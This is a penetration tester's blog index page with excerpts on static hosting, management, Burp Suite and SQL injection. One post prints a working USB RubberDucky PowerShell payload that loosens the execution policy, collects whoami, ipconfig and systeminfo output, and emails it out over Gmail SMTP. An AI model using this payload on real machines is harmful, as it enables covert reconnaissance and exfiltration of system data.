Birthday - Asteroids

Recently, I celebrated a birthday. Typically, this is a joyous time, and I have many things to be grateful for. However, this birthday comes during a difficult year. As my wife and I were discussing this the other day, I realized that life can be a lot like the Atari game ‘Asteroids’. Atari Asteroids ...

October 5, 2016 · 2 min · Chris

Static Sites in 2016 - Updated

In a previous post I discussed the complicated process of configuring S3 to use Letsencrypt to obtain a TLS certificate. That post served as a reference for me to re-implement Letsencrypt every 90 days. Since then, my 90-day Letsencrypt certificate expired, and I was at a loss for how to reinstate it. Using my own post as a reference didn’t help me with the arcane letsencrypt errors I was encountering. It was a pain in the ass trying to remember how to configure and use a combination of letsencrypt, awscli, virtual machines to run them in (letsencrypt has since implemented a docker option for running on OSX), et cetera, et cetera. I was hoping to get all of this done during a brief lull in my workday. Nope.jpg. I’m chalking my experience up to the non-standard use case of using letsencrypt to generate a TLS certificate for a site hosted on S3. Perhaps in the future there will be native support for S3/Cloudfront sites in letsencrypt, but it’s not there yet. ...

October 3, 2016 · 3 min · Chris

The Management Feedback Cycle

I planned a post covering the Manager Feedback Cycle, but this blog post at Effective Managers covers most of what I was going to communicate. One thing I would add to this resource is that both managers and subordinates should strike a balance in communication frequency: if communication is infrequent, important details can get overlooked, and it becomes harder to resolve conflicts; if communication is too frequent, the subordinate will feel like they’re being micromanaged, while the manager will feel like the subordinate can’t solve problems on their own.

April 15, 2016 · 1 min · Chris

Apple VS FBI

Apple gets a lot of flak in the InfoSec community, even though it’s an open secret that much of the InfoSec community has begun to use Apple products. I myself have been using a Mac laptop for the past ten years because they produced the first laptop I thought was worth spending money on. A lot of money. I’m a fan of Apple for more than just their products, however. I admire their stance on social issues that I care about. ...

March 28, 2016 · 4 min · Chris

Static Sites in 2016

It’s early 2016, and there are a multitude of content management systems and blog platforms out there (see Wikipedia’s List of Content Management Systems). The security blog I contribute to, Penetrate.IO, runs on the venerable WordPress and requires constant updates to stay one step ahead of attackers. This becomes tiresome after a while, especially since the only thing I’m interested in hosting is a series of articles. These don’t require server-side computation, simply hosting. It’s a little like web development from the late 90s: I only require simple HTTP hosting. ...

March 25, 2016 · 7 min · Chris

Configure an Upstream Proxy for Burpsuite

I had the need to proxy traffic from Burpsuite to another proxy during web app testing this week. There are a few ways to do this, but this method was the easiest since I already had Burpsuite’s TLS certificate installed. For more information on this, see the Burpsuite help. To configure an upstream proxy for Burpsuite, such as OWASP ZAP, follow these steps: First, configure your upstream proxy, which will sit between Burpsuite and the web application, to listen on a different port, since they both bind TCP 8080 by default. Here I’ve configured ZAP to listen on port 8082: ...

November 5, 2015 · 1 min · Chris

Make a connection

This post was inspired by a client who came to me and said “I do not understand all of these findings, can you explain them to me?”, referring to my web application penetration test deliverable. We spoke for an hour, as I described the findings to him. I corrected him when his understanding was shaky, and I confirmed where his understanding was solid. He had a development background, and was studying for a security certification, but he was managing a large security project for a well-known company and I was surprised to learn he was a security newbie. At the end of our conversation, he thanked me and said “Now I understand, and I’ll make sure my manager does as well!” ...

September 18, 2015 · 3 min · Chris

My Security 101

What I hope are some reasonable basic security practice recommendations

January 20, 2015 · 1 min · Chris

RubberDucky Powershell Payload

On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments:

    # Set execution policy to allow unrestricted script scope
    Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

    #Create results file in current user's temp directory
    $results = $env:temp + '\results.txt'

    #Run whoami
    $who = 'whoami.exe'
    $rwho = & $who

    #Run ipconfig /all
    $ipc = 'ipconfig.exe'
    $ipcs = '/all'
    $ripc = & $ipc $ipcs

    #Run systeminfo
    $sysi = 'systeminfo.exe'
    $rsysi = & $sysi

    #Wait for systeminfo to finish
    Start-Sleep -s 5

    #Write results
    $output = $rwho + $ripc + $rsysi | Out-File $results

    #Send results to e-mail address
    $hostname = $env:computername
    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredentials('<yourusername>', '<yourpassword>')
    $ResultMail = New-Object System.Net.Mail.MailMessage
    $ResultMail.From = '<fromaddress>'
    $ResultMail.To.Add('<destinationmail>')
    $ResultMail.Subject = "Mail Subject"
    $ResultMail.Body = "Mail Body"
    $ResultMail.Attachments.Add($results)
    $SMTPInfo.Send($ResultMail)

    #Optional pop-up confirmation box
    #Note: This WILL raise user suspicion
    $wshell = New-Object -ComObject Wscript.Shell
    $wshell.Popup("Operation Complete.", 0, "OK", 0x1)

Merry Christmas and Happy Holidays! ...

December 22, 2014 · 1 min · Chris

PHP, MySQL, and Injection

Inspired by Jack Daniel’s “Shoulders of InfoSec Project”, this post will be focused on the people and technologies behind one of the most prevalent attacks on web sites: SQL injection. According to OWASP, injection is the number one attack vector for web applications. Injection attacks can target many different contexts in a web application: HTML, PHP, ASP, JavaScript, SQL, etc. Any context in which an interpreter parses input to execute instructions is potentially vulnerable to an injection attack. There are several - many, rather - excellent tutorials on injection attacks available on the web. Here’s a brief selection of SQL injection attacks for reference: ...

November 26, 2014 · 12 min · Chris